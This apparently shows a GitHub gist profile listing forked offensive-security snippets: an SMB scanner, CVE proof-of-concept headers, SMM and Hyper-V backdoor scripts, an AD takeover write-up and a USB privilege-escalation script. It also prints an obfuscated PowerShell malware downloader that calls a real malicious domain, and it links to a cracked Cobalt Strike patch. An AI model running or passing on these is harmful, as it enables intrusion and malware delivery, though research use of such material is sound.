Skip to content

Instantly share code, notes, and snippets.

View jermainlaforce's full-sized avatar

Jermain La Force jermainlaforce

24 followers · 2 following
  • Toronto
View GitHub Profile
@jermainlaforce
jermainlaforce / check-smb-v3.11.sh
Created March 11, 2020 18:41 — forked from nikallass/check-smb-v3.11.sh
CVE-2020-0796. Scan HOST/CIDR with nmap script smb-protocols.nse and grep SMB version 3.11.
#!/bin/bash
if [ $# -eq 0 ]
then
echo $'Usage:\n\tcheck-smb-v3.11.sh TARGET_IP_or_CIDR'
exit 1
fi
echo "Checking if there's SMB v3.11 in" $1 "..."
nmap -p445 --script smb-protocols -Pn -n $1 | grep -P '\d+\.\d+\.\d+\.\d+|^\|.\s+3.11' | tr '\n' ' ' | replace 'Nmap scan report for' '@' | tr "@" "\n" | grep 3.11 | tr '|' ' ' | tr '_' ' ' | grep -oP '\d+\.\d+\.\d+\.\d+'
@jermainlaforce
jermainlaforce / gd-gif.php
Created March 23, 2020 00:50 — forked from asdqwe3124/gd-gif.php
<?php
//php gd-gif.php image.gif gd-image.gif
$gif = imagecreatefromgif($argv[1]);
imagegif($gif, $argv[2]);
imagedestroy($gif);
?>
@jermainlaforce
jermainlaforce / sample chain
Created May 26, 2020 04:32 — forked from JohnLaTwC/sample chain
Template injection attack 0733b16e7f871c095c124a5da28c554d3e8861d8160d879dbb2c0bc4668012b9
This file has been truncated, but you can view the full file.
## Sample hash:
## DOCX: 0733b16e7f871c095c124a5da28c554d3e8861d8160d879dbb2c0bc4668012b9
## template injection: 79658efd6d19e0704902af2ea9e3a30a7c2dc624e7195998e3af3c2289877b8d
## VBS: 9d77e8df4dc2c49594dac3bed4373051f3b9dd5f1228d1eeeb63f5d8048d9685
## Payload: 6d3d5cc0a0b26be8180ae4ade5f5cec26c94d06754a62251869d832ac6fe1c0c
## http://moveis-schuster-com.ga/Order.jpg returns:
Powershell.exe -w h $asciiChars='24 54 52 50 3D 27 2A 2E 2A 2D 45 58 27 2E 72 65 70 6C 61 63 65 28 27 2A 2E 2A 2D 27 2C 27 49 27 29 3B 20 73 61 6C 20 4D 61 73 74 65 72 20 24 54 52 50 3B 27 28 26 28 27 2B 27 47 27 2B 28 27 43 40 40 40 27 2E 72 65 70 6C 61 63 65 28 27 40 40 40 27 2C 27 4D 27 29 29 2B 27 20 2A 57 27 2B 27 2D 4F 2A 29 27 2B 20 27 4E 27 2B 27 65 74 2E 27 2B 27 57 27 2B 27 65 62 27 2B 27 43 6C 27 2B 27 69 27 2B 27 65 6E 74 29 27 2B 27 2E 44 27 2B 27 6F 77 27 2B 27 6E 6C 27 2B 27 6F 27 2B 27 61 64 27 2B 27 46 27 2B 27 69 27 2B 27 6C 27 2B 27 65 28 27 27 68 74 74 70 3A 2F 2F 6D 6F 76 65 69 73 2D 73 63 68 75 73 74 65 72 2D 63
@jermainlaforce
jermainlaforce / readme.md
Created October 16, 2020 14:34 — forked from jpluimers/readme.md
Some OpenVPN hardening links I hope to apply to pfSense
@jermainlaforce
jermainlaforce / PoC_CVE-2021-28482.py
Created May 24, 2021 15:14 — forked from testanull/PoC_CVE-2021-28482.py
PoC of CVE-2021-28482
import requests
import time
import sys
from base64 import b64encode
from requests_ntlm2 import HttpNtlmAuth
from urllib3.exceptions import InsecureRequestWarning
from urllib import quote_plus
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
@jermainlaforce
jermainlaforce / smm_backdoor_hyper_v.py
Created June 16, 2021 21:25 — forked from Cr4sh/smm_backdoor_hyper_v.py
Example program that uses SMM backdoor to deploy Hyper-V backdoor (see https://github.com/Cr4sh/s6_pcie_microblaze/tree/master/python/payloads/DmaBackdoorHv)
#!/usr/bin/env python
import sys, os, time, platform, ctypes
from struct import pack, unpack
from optparse import OptionParser, make_option
import smm_backdoor as bd
# how many seconds to wait for VM exit occur
VM_EXIT_WAIT = 3
@jermainlaforce
jermainlaforce / smm_backdoor_privesc_win.py
Created June 16, 2021 21:26 — forked from Cr4sh/smm_backdoor_privesc_win.py
Example program that uses SMM backdoor for local privileges escalation under the Windows
#!/usr/bin/env python
import sys, os, platform, ctypes, ctypes.wintypes
from struct import pack, unpack
import smm_backdoor as bd
# MSR register used by swapgs
IA32_KERNEL_GS_BASE = 0xc0000102
@jermainlaforce
jermainlaforce / Workstation-Takeover.md
Created July 26, 2021 15:46 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@jermainlaforce
jermainlaforce / cobaltstrike.crack
Created August 5, 2021 04:20 — forked from wonderkun/cobaltstrike.crack
cobaltstrike.crack
http://transfer.sh3ll.me/K3wEk/cobaltstrike.jar.patch
@jermainlaforce
jermainlaforce / usbgadget_razer.sh
Created August 22, 2021 13:58 — forked from tothi/usbgadget_razer.sh
Razer USB gadget on Android for Local Privilege Escalation on Windows
# MINIMAL USB gadget setup using CONFIGFS for simulating Razer Gaming HID
# devices for triggering the vulnerable Windows Driver installer
# credits for the Windows Driver install vuln: @j0nh4t
#
# https://twitter.com/j0nh4t/status/1429049506021138437
# https://twitter.com/an0n_r0/status/1429263450748895236
#
# the script was developed & tested on Android LineageOS 18.1